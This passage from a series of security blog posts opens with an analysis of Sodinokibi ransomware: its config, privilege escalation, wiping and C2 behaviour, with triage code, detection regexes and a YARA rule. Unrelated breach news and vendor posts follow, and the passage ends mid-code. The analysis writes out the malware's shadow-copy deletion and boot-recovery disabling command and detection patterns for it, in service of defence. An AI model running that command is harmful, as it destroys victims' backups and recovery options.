  • nname -> The string of the name of the malware for the ransom note file. It is a template that will have a part that will be random in the execution.
  • exp -> This field is very important in the config. By default it will usually be ‘false’, but if it is ‘true’, or if the check of the hash of the config fails, the malware will use the exploit CVE-2018-8453. The value is false by default because this exploit does not always work and can cause a Blue Screen of Death, which defeats the malware’s goal of encrypting the files and requesting the ransom. If the exploit works, it will elevate the process to the SYSTEM user.
  • img -> A string encoded in base64. It is the template for the image that the malware will create in runtime to change the wallpaper of the desktop with this text.
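As an added example (not code from the McAfee analysis), the following Python triage helper reads a decrypted config with the field names listed above and reports which destructive options are switched on, which processes, folders and domains it names, and whether a given file path would be wiped, skipped or encrypted. The sample config, its domains and note text are constructed; the case-insensitive matching, the 1 MiB reading of “1 megabyte” and the order in which wipe folders and whitelists are checked are assumptions the analysis does not state.

```python
"""Triage helper for a decrypted Sodinokibi-style configuration.

Added example, not code from the McAfee analysis. Field names follow the
list above; the sample config, domains and note text are constructed.
Assumptions: folder and file names compare case-insensitively, extensions
compare without the leading dot, "1 megabyte" is read as 1 MiB, and
whether the wipe step honours the whitelist is not stated, so wipe folders
are checked first (the wipe step runs before encryption in the flow).
"""
import base64
import json
import ntpath

FAST_MODE_BYTES = 1024 * 1024  # "fast": only the first 1 MiB of a file is crypted

# Constructed sample config (a real "pk" holds a base64 affiliate public key).
SAMPLE_CONFIG = json.dumps({
    "pk": base64.b64encode(b"<placeholder-affiliate-public-key>").decode(),
    "pid": "23",
    "sub": "471",
    "dbg": False, "fast": True, "wipe": True, "net": True, "exp": False,
    "wht": {"fld": ["windows", "program files", "$recycle.bin"],
            "fls": ["ntldr", "boot.ini", "desktop.ini"],
            "ext": ["exe", "dll", "sys", "lnk"]},
    "wfld": ["backup", "backups"],
    "prc": ["mysql.exe", "sqlserver.exe"],
    "dmn": ["example.invalid", "example.test"],
    "nbody": base64.b64encode(b"---=== Welcome. Again. ===---\r\n").decode(),
    "nname": "{EXT}-readme.txt",
    "img": base64.b64encode(b"All of your files are encrypted!").decode(),
})


def load_config(text: str) -> dict:
    """Parse the decrypted JSON config."""
    return json.loads(text)


def summarize(cfg: dict) -> dict:
    """Pull out what an analyst reports on: who, where, and which
    destructive options are enabled."""
    note = base64.b64decode(cfg.get("nbody", "")).decode("latin-1")
    return {
        "affiliate": cfg.get("pid"),
        "campaign": cfg.get("sub"),
        "kills_processes": list(cfg.get("prc", [])),
        "c2_domains": list(cfg.get("dmn", [])) if cfg.get("net") else [],
        "wiper_folders": list(cfg.get("wfld", [])) if cfg.get("wipe") else [],
        "uses_exploit": bool(cfg.get("exp")),
        "skips_language_check": bool(cfg.get("dbg")),
        "note_name_template": cfg.get("nname"),
        "note_preview": note[:40],
    }


def _lower_set(values) -> set:
    return {v.lower() for v in values}


def classify_path(path: str, cfg: dict) -> str:
    """Return 'wipe', 'skip' or 'encrypt' for one file path under this config."""
    folder, name = ntpath.split(path)
    parts = [p.lower() for p in folder.replace("/", "\\").split("\\") if p]
    ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
    wht = cfg.get("wht", {})
    # Wipe step: files in any folder named in "wfld" are destroyed
    # (assumption: the whitelist is not consulted when wiping).
    if cfg.get("wipe") and any(p in _lower_set(cfg.get("wfld", [])) for p in parts):
        return "wipe"
    # Encryption step honours the three whitelists in "wht".
    if any(p in _lower_set(wht.get("fld", [])) for p in parts):
        return "skip"
    if name.lower() in _lower_set(wht.get("fls", [])):
        return "skip"
    if ext in _lower_set(wht.get("ext", [])):
        return "skip"
    return "encrypt"


def bytes_encrypted(size: int, cfg: dict) -> int:
    """Bytes of a file of `size` bytes that get crypted under the "fast" setting."""
    return min(size, FAST_MODE_BYTES) if cfg.get("fast") else size


if __name__ == "__main__":
    cfg = load_config(SAMPLE_CONFIG)
    for key, value in summarize(cfg).items():
        print(f"{key:22} {value}")
    for p in (r"C:\Windows\System32\kernel32.dll", r"D:\Backup\db.bak",
              r"C:\Users\alice\Documents\report.docx"):
        print(classify_path(p, cfg), p)
```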

After decrypting the malware config, the malware parses it and checks the “exp” field; if the value is ‘true’, it detects the type of operating system using the PEB fields that report the major and minor version of the OS.

FIGURE 6. CHECK OF THE VERSION OF THE OPERATIVE SYSTEM

Usually only one OS version is found, but that is enough for the malware. The malware then checks the file time to verify whether the date is before or after the patch that fixes the exploit was installed. If the file time is before the file time of the patch, it checks whether the OS is 64-bit or 32-bit using the function “GetSystemNativeInfoW”. When the OS is 32-bit, it uses a shellcode embedded in the malware that is the exploit; in the case of a 64-bit OS, it uses another shellcode that can use “Heaven’s Gate” to execute 64-bit code from a 32-bit process.

FIGURE 7. CHECK IF OS IS 32- OR 64-BIT

If the field was false, or the exploit is patched, the malware checks the OS version again using the PEB. If the OS is at least Windows Vista, it reads the execution privilege level from its own process token. When the discovered level is below 0x3000 (0x3000 being the level of a process running as a real administrator or as SYSTEM), it relaunches itself with the ‘runas’ command to elevate from the 0x2000 or 0x1000 level to 0x3000. After relaunching itself with ‘runas’, the original malware instance finishes.

FIGURE 8. CHECK IF OS IS WINDOWS VISTA MINIMAL AND CHECK OF EXECUTION LEVEL

The malware’s next action is to check whether its execution privilege is SYSTEM. When it is, the malware finds the process “Explorer.exe”, gets the token of the user that launched that process and impersonates it. This is a downgrade from SYSTEM to a user with fewer privileges, to avoid affecting the desktop of the SYSTEM user later.

After this it parses the config again and gathers information about the victim’s machine: the user of the machine, the name of the machine, etc. The malware prepares a victim id, to know who is affected, from two 32-bit values concatenated into one hexadecimal string.

The first of these two values is the serial number of the hard disk of the main Windows logic unit, and the second is the CRC32 hash of that serial number, computed with a hardcoded seed that changes per sample.

FIGURE 9. GET DISK SERIAL NUMBER TO MAKE CRC32 HASH

After this, the result is used as a seed to make the CRC32 hash of the name of the processor of the machine. But this name of the processor is not extracted using the Windows API as GandCrab does; in this case the malware authors use the opcode CPUID to try to make it more obfuscated.

FIGURE 10. GET THE PROCESSOR NAME USING CPUID OPCODE

Finally, it converts these values in a string in a hexadecimal representation and saves it.

Later, during the execution, the malware writes the following entries in the Windows registry under the subkey “SOFTWARE\recfg” (this subkey can change in some samples but usually does not).

The key entries are:

  • 0_key -> Type binary; this is the master key (includes the victim’s generated random key to crypt later together with the key of the malware authors).
  • sk_key -> Like the 0_key entry, it is the victim’s private key, encrypted, but with the affiliate public key hardcoded in the sample. It is the key used in the decryptor by the affiliate, but it also means that the malware authors can always decrypt any file crypted with any sample, as a secondary resource to decrypt the files.
  • pk_key -> Victim public key derived from the private key.
  • subkey -> Affiliate public key to use.
  • stat -> The information gathered from the victim machine, which is placed, encrypted, in the ransom note and in the POST sent to the domains.
  • rnd_ext -> The random extension for the encrypted files (can be from 5 to 10 alphanumeric characters).

The malware first tries to write the subkey and the entries in the HKEY_LOCAL_MACHINE hive and, if that fails, it writes them in the HKEY_CURRENT_USER hive.

FIGURE 11. EXAMPLE OF REGISTRY ENTRIES AND SUBKEY IN THE HKLM HIVE

The information that the malware gets from the victim machine can be the user name, the machine name, the domain where the machine belongs or, if not, the workgroup, the product name (operating system name), etc.

After this step is completed, the malware checks the “dbg” option gathered from the config. If that value is ‘true’, it skips checking the language of the machine; if the value is ‘false’ (the default), it checks the machine language and compares it with a list of hardcoded values.

FIGURE 12. GET THE KEYBOARD LANGUAGE OF THE SYSTEM

The malware checks against the next list of blacklisted languages (they can change per sample in some cases):

  • 0x818 – Romanian (Moldova)
  • 0x419 – Russian
  • 0x819 – Russian (Moldova)
  • 0x422 – Ukrainian
  • 0x423 – Belarusian
  • 0x425 – Estonian
  • 0x426 – Latvian
  • 0x427 – Lithuanian
  • 0x428 – Tajik
  • 0x429 – Persian
  • 0x42B – Armenian
  • 0x42C – Azeri
  • 0x437 – Georgian
  • 0x43F – Kazakh
  • 0x440 – Kyrgyz
  • 0x442 – Turkmen
  • 0x443 – Uzbek
  • 0x444 – Tatar
  • 0x45A – Syrian
  • 0x2801 – Arabic (Syria)

We observed that Sodinokibi, like GandCrab and Anatova, blacklists both the regular Syrian language and the Syrian language in Arabic. If the system contains one of these languages, the malware exits without performing any action. If a different language is detected, it continues in the normal flow.

This is interesting and may hint to an affiliate being involved who has mastery of either one of the languages. This insight became especially interesting later in our investigation.

If the malware continues, it will search all processes in the list in the field “prc” in the config and terminate them in a loop to unlock the files locked for this/these process/es.

FIGURE 13. SEARCH FOR TARGET PROCESSES AND TERMINATE THEM

After this it will destroy all shadow volumes of the victim machine and disable the protection of the recovery boot with this command:

  • exe /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures

It is executed with the Windows function “ShellExecuteW”.

FIGURE 14. LAUNCH COMMAND TO DESTROY SHADOW VOLUMES AND DESTROY SECURITY IN THE BOOT
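The shadow-copy deletion and boot-recovery changes above are a strong detection opportunity because all three operations appear in a single command line. The following Python detection logic, an added example that is not part of the McAfee analysis, runs three rules over constructed process-creation events in a minimal key=value format (the field names and the benign entries are assumptions for illustration) and raises severity when the whole chain is present.

```python
"""Detection logic for the shadow-copy / boot-recovery tampering chain.

Added example, not part of the McAfee analysis. The log lines below are
constructed in a minimal Sysmon-like "key=value" format; the field names
and the benign entries are assumptions for illustration only.
"""
import re

# Each rule: (technique name, pattern matched against the command line)
RULES = [
    ("shadow_copy_deletion",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("recovery_disabled",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no", re.I)),
    ("boot_failures_ignored",
     re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures", re.I)),
]

# Constructed sample events (not real telemetry): one benign vssadmin query,
# one full destructive chain launched from a temp-folder parent, one bcdedit query.
SAMPLE_LOG = """\
ts=2019-10-02T09:12:01Z image=C:\\Windows\\System32\\vssadmin.exe parent=C:\\Windows\\System32\\svchost.exe cmd="vssadmin list shadows"
ts=2019-10-02T09:14:33Z image=C:\\Windows\\System32\\cmd.exe parent=C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe cmd="cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures"
ts=2019-10-02T09:15:10Z image=C:\\Windows\\System32\\bcdedit.exe parent=C:\\Windows\\explorer.exe cmd="bcdedit /enum"
"""

# key=value pairs; quoted values may contain spaces
FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def parse_event(line: str) -> dict:
    """Split one key=value line into a dict, honouring quoted values."""
    return {m.group(1): (m.group(3) if m.group(3) is not None else m.group(2))
            for m in FIELD_RE.finditer(line)}


def match_rules(cmdline: str) -> list:
    """Names of the rules that fire on a command line, in rule order."""
    return [name for name, pattern in RULES if pattern.search(cmdline)]


def scan_log(text: str) -> list:
    """Return one alert per matching event; the full chain in one
    command line is rated critical, a partial match high."""
    alerts = []
    for line in text.splitlines():
        event = parse_event(line)
        hits = match_rules(event.get("cmd", ""))
        if not hits:
            continue
        severity = "critical" if len(hits) == len(RULES) else "high"
        alerts.append({"ts": event.get("ts"), "parent": event.get("parent"),
                       "severity": severity, "techniques": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```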

Next it checks the config field “wipe” and, if it is true, destroys and deletes the target files, overwriting them with random trash or with NULL values. To destroy the files, the malware enumerates all logic units and finally the network shares, looking for folders whose names appear in the config field “wfld”.

FIGURE 15. WIPE FILES IN THE TARGET FOLDERS

In the case where an affiliate creates a sample that has defined a lot of folders in this field, the ransomware can be a solid wiper of the full machine.

The next action of the malware is its main function, encrypting the files in all logic units and network shares, avoiding the white listed folders and names of files and extensions, and dropping the ransom note prepared from the template in each folder.

FIGURE 16. CRYPT FILES IN THE LOGIC UNITS AND NETWORK SHARES

After finishing this step, it creates the desktop image at runtime from the text in the config file, filled in with the random extension that affects the machine.

The next step is checking the “net” field of the config; if it is true, the malware starts sending a POST message to the list of domains in the config field “dmn”.

FIGURE 17. PREPARE THE FINAL URL RANDOMLY PER DOMAIN TO MAKE THE POST COMMAND

This part of the code has similarities to the code of GandCrab, which we will highlight later in this article.

After this step the malware wipes its own variables and strings in memory. It does not remove its code, but it does remove the critical contents so that memory dumps or forensic tools cannot recover that information from RAM.

FIGURE 18. CLEAN MEMORY OF VARS

If the malware was running as SYSTEM after the exploit, it will revert its rights and finally finish its execution.

FIGURE 19. REVERT THE SYSTEM PRIVILEGE EXECUTION LEVEL

Code Comparison with GandCrab

Using the unpacked Sodinokibi sample and a v5.03 version of GandCrab, we started to use IDA and BinDiff to observe any similarities. Based on the Call-Graph it seems that there is an overall 40 percent code overlap between the two:

FIGURE 20. CALL-GRAPH COMPARISON

The most overlap seems to be in the functions of both families. Although values change, going through the code reveals similar patterns and flows:

Although here and there are some differences, the structure is similar:


We already mentioned that the code part responsible for the random URL generation has similarities with regards to how it is generated in the GandCrab malware. Sodinokibi is using one function to execute this part where GandCrab is using three functions to generate the random URL. Where we do see some similar structure is in the parts for the to-be-generated URL in both malware codes. We created a visual to explain the comparison better:

FIGURE 21. URL GENERATION COMPARISON

We observe how even though the way both ransomware families generate the URL might differ, the URL directories and file extensions used have a similarity that seems to be more than coincidence. This observation was also discovered by Tesorion in one of its blogs.

Overall, looking at the structure and coincidences, either the developers of the GandCrab code used it as a base for creating a new family or, another hypothesis, is that people got hold of the leaked GandCrab source code and started the new RaaS Sodinokibi.

Conclusion

Sodinokibi is a serious new ransomware threat that is hitting many victims all over the world.

We executed an in-depth analysis comparing GandCrab and Sodinokibi and discovered a lot of similarities, indicating the developer of Sodinokibi had access to GandCrab source-code and improvements. The Sodinokibi campaigns are ongoing and differ in skills and tools due to the different affiliates operating these campaigns, which begs more questions to be answered. How do they operate? And is the affiliate model working? McAfee ATR has the answers in episode 2, “The All Stars.”

Coverage

McAfee is detecting this family by the following signatures:

  • “Ransom-Sodinokibi”
  • “Ransom-REvil!”.

MITRE ATT&CK Techniques

The malware sample uses the following MITRE ATT&CK™ techniques:

  • File and Directory Discovery
  • File Deletion
  • Modify Registry
  • Query Registry
  • Registry modification
  • Query information of the user
  • Crypt Files
  • Destroy Files
  • Make C2 connections to send information of the victim
  • Modify system configuration
  • Elevate privileges

YARA Rule

rule Sodinokobi
{
    /*
    This rule detects Sodinokobi Ransomware in memory in old samples and perhaps future.
    */
    meta:
        author      = "McAfee ATR team"
        version     = "1.0"
        description = "This rule detects Sodinokobi Ransomware in memory in old samples and perhaps future."
    strings:
        $a = { 40 0F B6 C8 89 4D FC 8A 94 0D FC FE FF FF 0F B6 C2 03 C6 0F B6 F0 8A 84 35 FC FE FF FF 88 84 0D FC FE FF FF 88 94 35 FC FE FF FF 0F B6 8C 0D FC FE FF FF }
        $b = { 0F B6 C2 03 C8 8B 45 14 0F B6 C9 8A 8C 0D FC FE FF FF 32 0C 07 88 08 40 89 45 14 8B 45 FC 83 EB 01 75 AA }
    condition:
        all of them
}


The post McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us appeared first on McAfee Blogs.

Security in A World of “WE” – Embracing Our Third Party Ecosystems

In our increasingly digital world, technological innovation not only presents new opportunities, but also raises new risks and challenges that must be addressed collaboratively by industry, buyers, users, and policymakers. Specifically, digitization demands that risk be addressed across a dramatically expanding supply chain. These risks include the security threats of manipulation, espionage and disruption of information and information systems and services.

Empirical reports reveal that the third party ecosystem remains a fundamental risk to the integrity of our information systems. For example, analysis of the last nine consecutive years of Verizon’s global Data Breach Investigation Reports illustrates that where breaches can be attributed, 73% arise from the third party ecosystem. Moreover, not only are we increasing the volume of third parties in our information systems supply chains, we continue to invite third parties into our security inner sanctums – our security enforcing technology. Cisco’s 2018 Annual Cybersecurity Report revealed that 79% of global enterprises and governments rely on at least 20 third party security vendors.

The message is clear: the cyber supply chain and its related third party risk must be addressed. These security risks must be tackled comprehensively across all stages of the supply chain, including design, software development, manufacturing and sustainment. In parallel, our procurement practices, policies and certification and validation schemas should also seek to mitigate the impact of this third party risk. Public-private partnership brings civilian, government and defense agencies together with private industry to develop meaningful recommendations to effectively mitigate third party risk. NATO has recognized and is actively addressing this challenge in coordination with its member nations.

I will tackle this very challenge in my upcoming keynote, “The Trolls Under the Bridge: Who & What Lurks in Your Supply Chain?” at NATO’s NIAS19 Conference in Mons, Belgium in October https://nias19.com. I will share views on a path forward to meaningfully reduce risk across the increasingly broad and deep third party ecosystem upon which governments and enterprises around the world rely. I look forward to sharing the perspective that we simply must drive what I refer to as Pervasive Security. Pervasive Security designed to deploy a layered approach balancing physical security, operational security, behavioral security, information security and security technology across the cyber supply chain based on risk prioritization.

My discussion will build on NATO’s 2017 Technical and Implementation Directive on Supply Chain Security for COTS CIS Security Enforcing Products. And, I will showcase a practical framework to identify, prioritize and mitigate the impacts of tainted and counterfeit information systems technology across the supply chain and its third party members.

One of NIAS19’s key themes is “supply chain security challenges”. Specifically to answer that challenge, I will discuss tested, practical methods to address those challenges. After all, risk travels up and down the supply chain. Approaching supply chain security comprehensively is key to ensuring successful risk management. Fundamental steps to comprehensive security require that all supply chains:

1. Identify areas of potential impact, for example:

  • Risks to continuity of supply of third party provided software, services, components and raw materials
  • Natural disasters
  • Geopolitical and economic disruption
  • Workforce instability
  • Financial volatility
  • Weak infrastructure security
  • Insufficient end-user risk awareness

2. Prioritize risk by both likelihood of occurrence and severity of impact

3. Establish criteria for mitigating security threats and reducing the impact of incidents

4. Collaborate with industry and government on policy, regulations and directives.

October is Cybersecurity Awareness Month! Join the conversation, as all of us are part of the global supply chain. For additional insight on this challenge visit Cisco’s Value Chain Security Capability.

Security is Shifting to a Unified Cloud Edge

More than 95% of companies today use cloud services, and 83% store sensitive data in the cloud. Mobile devices and laptops allow for work to occur both inside and outside the network, pushing the boundary for security to a new edge defined by the cloud. Yet only 30% of companies today can protect data with the same policies on their devices, network, and in the cloud. Only 36% can enforce data loss prevention (DLP) rules in the cloud at all. And sixty percent currently have no way to stop a personal, unsecured mobile device from downloading sensitive data from the cloud, completely invisible to IT.

We’re in the midst of a transition from the network-centric, walled-garden model of security to one defined by device and cloud control points, which allows for freedom of motion to any location where work gets done, and in any cloud service.

We call this a Unified Cloud Edge. It is our vision for how companies can secure their data in a consistent manner as it moves between devices and the cloud, and from cloud to cloud. By following the data, we can see this vision come to life:

  • Data at the device, going to the cloud. Data Loss Prevention (DLP) stops any data that should not enter the cloud from leaving a managed device.
  • Device access to data in cloud services. The combination of a Cloud Access Security Broker (CASB) and Secure Web Gateway (SWG) control access to all cloud services, with the CASB controlling access to sanctioned services like Office 365 and the SWG covering every other service, including Shadow IT.
  • Data in the cloud, moving from cloud to cloud. CASB uses an API-based connection to cloud services for complete visibility and control over data within the cloud services you sanction, as well as data in motion from one cloud service to another. And machine learning capabilities give you the ability to stop threats in the cloud.
  • Data in the cloud, going to an unmanaged, personal device. CASB uses a reverse proxy to enforce authentication to your sanctioned cloud services, blocking access from any devices you don’t want to access your data, such as personal iOS or Android devices.


Figure 1: Simplified architecture for Unified Cloud Edge

Each of the control points in this architecture is built to work together seamlessly. In our Technical Preview of Unified Cloud Edge, we go into more detail on the management and policy creation experience, with examples of what you’ll see day to day. Head over here to download it.

For security and data protection admins, we know much of the daily work is allocated to investigation and incident management workflows. That’s why with Unified Cloud Edge, we’ve centralized all reporting, incident management, and investigation workflows for endpoint, network, and cloud data protection in McAfee ePO. For our customers with existing data protection classification and policies in ePO, we’ve also enabled a simple synchronization to our CASB for fast and efficient policy creation in the cloud.

Keep reading in our detailed Technical Preview of Unified Cloud Edge here, and contact us if you want to discuss implementation at your organization.

The post Security is Shifting to a Unified Cloud Edge appeared first on McAfee Blogs.

Hacker Claims to Have Compromised 200 Million Words with Friends Accounts

The hacker allegedly behind the Collection #1 and Collection #2 data breaches has claimed responsibility for the compromise of more than 200 million users of a popular iOS and Android gaming app.

Online cybersecurity site the Hacker News reported earlier this week that Pakistani hacker Gnosticplayers had gained access to the player database of Zynga’s Scrabble clone called Words with Friends, and the personal information of 218 million users.

Gnosticplayers shared a data sample that included user names, email addresses, logins, passwords, phone numbers, Facebook IDs, and Zynga account IDs.

Zynga released a statement saying only that, “certain player account information may have been illegally accessed by outside hackers.” But since that announcement on September 12, it has declined to comment further.

The Collection #1 and Collection #2 hacks made the information of 747 million stolen accounts from over 20 websites available on the dark web earlier in 2019.

Words with Friends users should update their passwords and practice good cyber-hygiene, including not re-using passwords, and checking online services like haveibeenpwned.com to determine if any of their other accounts have been affected.

The post Hacker Claims to Have Compromised 200 Million Words with Friends Accounts appeared first on Adam Levin.

Do You Know If Your DNS Server Can Be Used For DDoS Attacks?

Melissa Bruno // So you have an Internet-facing DNS server. Maybe you decided to set one up at home for fun, or your company has one that works with other services. Either way, you probably have a group of people in mind who should be using it. But are you sure that they’re the only […]

The post Do You Know If Your DNS Server Can Be Used For DDoS Attacks? appeared first on Black Hills Information Security.

Former American Express employee under investigation for customers’ data abuse

Authorities are investigating an American Express employee for unauthorized access to cardholder information and potentially abuse for fraud.

Authorities launched a criminal investigation into an American Express employee suspected of having accessed cardholder information and potentially abused it for fraud.

Exposed information includes full name, physical and/or billing address, Social Security numbers, birth dates, and the credit card number.

The suspect is no longer working for the financial organization.

On September 30th, 2019, the financial institution began sending out data breach notifications to the impacted customers; the notice informed them that the former employee potentially used the data for fraudulent activities, including identity theft and financial fraud.

“It was brought to our attention that personal information, related to your American Express Card account listed above, may have been wrongfully accessed by one of our employees in an attempt to conduct fraudulent activity, including potentially opening accounts at other financial institutions.” reads the data breach notification. “In response, we immediately launched an investigation and are fully cooperating with law enforcement agencies to further their investigation.”

American Express is offering free credit monitoring services through Experian Identity Works to impacted customers.

The company is also recommending impacted cardholders to monitor their credit report and statements for any fraudulent activity and report any suspicious activity to their bank.

Pierluigi Paganini

(SecurityAffairs – American Express, cybercrime)

The post Former American Express employee under investigation for customers’ data abuse appeared first on Security Affairs.

In Identity Theft the Target is You!

The hard truth is that identity data is the new gold—and criminal panhandlers are mining it for sale and distribution on the Dark Web.

Indeed, the internet provides ways for big data breaches to result in disastrous leaks of huge databases of personal information, resulting in detailed profiles of individuals—based on their internet behaviors, including social media activities, online shopping, financial transactions and more—being sold for nefarious purposes.

It’s all about identity theft. What does it mean for digital citizens like us? And what can we do about it?

The Mining of Identity Data

In 2019, data of all kinds is being criminally mined on the internet, but the theft and sale of identity data in particular is rising dramatically. How is this possible? In today’s highly-connected society, we’re constantly being asked to provide personal information to retailers, surveys, medical professionals, and other data collection efforts. We constantly disclose our name, address, social security number, health status, purchasing history, credit card numbers, and more. Anytime there’s a breach in an online database holding such data, by accident or malicious hacker intent, cybercriminals pounce on it to mine it for the identity gold.

“Identity theft and identity fraud…refer to all types of crime in which someone wrongfully obtains and uses another person’s personal data…,” says the US Department of Justice, Criminal Division, in its Fraud Section report, reminding us what it’s all about. Data breaches are the goldmine for this kind of theft.

One of the more recent breaches collected, packaged and sold about 26 Million new accounts on the Dark Web by hacking several websites, including online shopping, career and learning platforms. A longer list of breaches—see The 18 Biggest Data Breaches of the 21st Century, as well as Wikipedia’s List of Data Breaches—reveals how chronic it’s become. Because our personal data is often stored on internet sites, many of which are crucial to our way of life, we forget that simply registering and providing personal details can lead to more precise and accurate description of our location, our healthcare information, and even information indicated on our government issued IDs. And its sale on the Dark Web is a very bad outcome.

The Dark Web (or Darknet) refers to that part of the internet that hides your identity and location when you’re on it. Dark Web websites are accessible only through Tor (the “Onion Routing” browser) and through I2P (the Invisible Internet Project). Historically, one of the reasons for the creation of the Dark Web was to provide US Navy intelligence officers a means to maneuver on the internet without being recognized or traced. The Tor network achieves anonymity by bouncing the request through a large number of intermediate servers and employing a layered encryption system on the identification of the source IP where the search originated, so that no one knows where the request for a webpage or site ultimately comes from. I2P specializes in allowing the anonymous hosting of websites, so the target IP address is unknown to the searcher.

In short, browsing the Dark Web allows you to anonymously access “anonymized” websites, not all of which are bad, but also many sites that are, collectively known as Darknet markets. The former category includes SecureDrop, which lets news organizations receive anonymous submissions.  The latter category included Silkroad 1.0, which was launched in February of 2011; and 2.0, which was finally shut down in November of 2014 by the FBI. The Dark Web or Darknet is still a channel for all kinds of illegal activities, including a place for radical extremists to spread propaganda—and remains a region on the internet for the sale of illegally gotten identity data.

Protecting Your Identity

Although data protection laws state that any personal data set that’s stored online has to be stripped of identifiers such as name and social security, true compliance is difficult to maintain or enforce—so each one of us has the ultimate responsibility to protect our data to stay safe online. Here are some practical steps you can take to help protect your identity:

Accounts and Usernames: Think carefully when choosing your username for your online accounts and email addresses. Choose something that does not closely identify with your full name or other personal information.

Passwords: If you use several internet services, social media accounts, and email addresses, you’ll need a lot of passwords. Tempting as it is, avoid using the same password for all your accounts. Use a unique password for each account, one that you can remember, but that’s not easy to guess. We highly recommend using Trend Micro Password Manager to generate strong passwords, to keep them safe, and to change them frequently. Banking apps and other payment system apps also utilize two-factor authentication, which you should take advantage of for more secure transactions and purchases.

Privacy: Keep your personal information private online and enable strong privacy controls on your social media accounts.

Protect your devices: Don’t leave your mobile devices and laptops unattended and enable PIN and password to unlock them.

Remediation: If you hear of a major online data breach, sit up and take notice: you might need to take active steps to remediate the situation. As with the Equifax Data Breach of 2017, where sensitive data on 143 Million Americans was exposed, remediation may mean locking or freezing your credit on each of the credit bureaus: Equifax, Experian, and TransUnion. With other types of breaches, it may simply mean closing an account or canceling a credit card. As with the credit bureaus, many banks have identity protection services which you can also avail yourself of.

Trend Micro ID Safe

Apart from the best practices outlined above, you should also install Trend Micro ID Safe for Android and iOS on your mobile devices, to monitor and help remediate any known security issues with your identity data.

What is ID Safe? ID Safe checks if any of your personal information stolen from data breaches is circulating on the Dark Web for sale or distribution by cybercriminals. It identifies which accounts were breached and the kind of data posted, then notifies you, so you can take steps to change your account credentials or remediate any potential effects of the illegal distribution or sale of your personal data.

Top-notch Security. To ensure the highest level of security when handling your personal information, ID Safe first hashes the data you enter on the app (essentially converting the text to an irreversible number) using the SHA-256 hashing standard—the world’s most secure— before sending it through an encrypted connection to check it against a comprehensive Dark Web database.

Easy to Use Tools. You can quickly check if your personal data has reached the Dark Web with just a few taps, using its various tools:

  • Email Checker. See if the email address you use for online accounts has appeared on the Dark Web due to a data breach. If it finds your address, the app shows exactly which accounts suffered the breach, so you immediately know which passwords to change.
  • Credit Card Checker. Find out if someone has stolen your credit card number and put it on the Dark Web.
  • Password Checker. You should not only use unique passwords for all of your accounts, but also choose passwords that nobody else has ever used. ID Safe can see if you have used a password currently in circulation on the Dark Web.
  • Dark Web Personal Data Monitor. ID Safe can scour the Dark Web for sensitive personal information like your bank account numbers, driver’s license data, social security number, and passport details, then immediately alert you if they ever appear there.

GDPR Compliant. Finally, you should know that Trend Micro takes your privacy seriously and complies with the European Union's General Data Protection Regulation (GDPR) to protect your data. Read ID Safe's data collection notice here:

https://esupport.trendmicro.com/en-us/home/pages/technical-support/1121937.aspx

For more information and to download ID Safe, go to Trend Micro ID Safe on the iOS App Store and Trend Micro ID Safe on Google Play.

The post In Identity Theft the Target is You! appeared first on .

Cyber Security Roundup for September 2019

Anyone over the age of 40 in the UK will remember patiently browsing for holiday bargains on their TV via Teletext. While the TV version of Teletext Holidays died out years ago with the rise of the world-wide-web, Teletext Holidays, a trading name of Truly Travel, continued as an online and telephone travel agent. Verdict Media discovered an unsecured Amazon Web Services cloud server used by Teletext Holidays and was able to access 212,000 call centre audio recordings of calls with its UK customers. The recordings were made between 10th April and 10th August 2016 and were found in a data repository called 'speechanalytics'. Businesses neglecting to properly secure their cloud services is an increasingly common cause of mass data breaches. Using cloud-based IT systems does not absolve a business of its security responsibilities: under the shared-responsibility model the provider secures the underlying platform, but the customer remains responsible for who can reach the data it stores there.

Booking Holidays on Ceefax in the 1980s

Within the Teletext Holidays call recordings, customers can be heard arranging holiday bookings and giving call-centre agents partial payment card details, their full names, and the dates of birth of accompanying passengers. Verdict Media also reported that in some recordings customers' private conversations were captured while they were on hold. Teletext Holidays said it has reported the data breach to the ICO.

Separately, another poorly secured cloud server was discovered holding thousands of CVs originating from the Monster.com job-hunting website. Monster.com said the exposed CVs dated from between 2014 and 2017 and attributed the exposure to a 'third-party' it no longer works with.
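Both of the exposures above come down to storage that the owner believed was private and was not. The article does not say which AWS service was involved, so the following added example (my own code, not Verdict Media's or Teletext's) assumes the common case of an S3 bucket and shows the three things an auditor would pull for it: the bucket policy, the bucket ACL and the account's Block Public Access settings. The input documents are constructed to match the shapes the S3 API returns (GetBucketPolicy, GetBucketAcl, GetPublicAccessBlock) so the check runs offline; the bucket name is borrowed from the article purely as a label and the ARNs and account IDs are made up.

```python
import json

PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}


def _principal_is_everyone(principal):
    """Policy principals that mean 'anyone on the internet'."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False


def public_policy_statements(policy):
    """Sids of unconditional Allow statements whose principal is everyone."""
    hits = []
    for i, st in enumerate(policy.get("Statement", [])):
        if (st.get("Effect") == "Allow"
                and _principal_is_everyone(st.get("Principal"))
                and not st.get("Condition")):
            hits.append(st.get("Sid", "Statement[%d]" % i))
    return hits


def public_acl_grants(acl):
    """(group, permission) pairs granted to the AllUsers/AuthenticatedUsers groups."""
    hits = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            hits.append((grantee["URI"].rsplit("/", 1)[-1], grant.get("Permission")))
    return hits


def audit_bucket(name, policy, acl, public_access_block):
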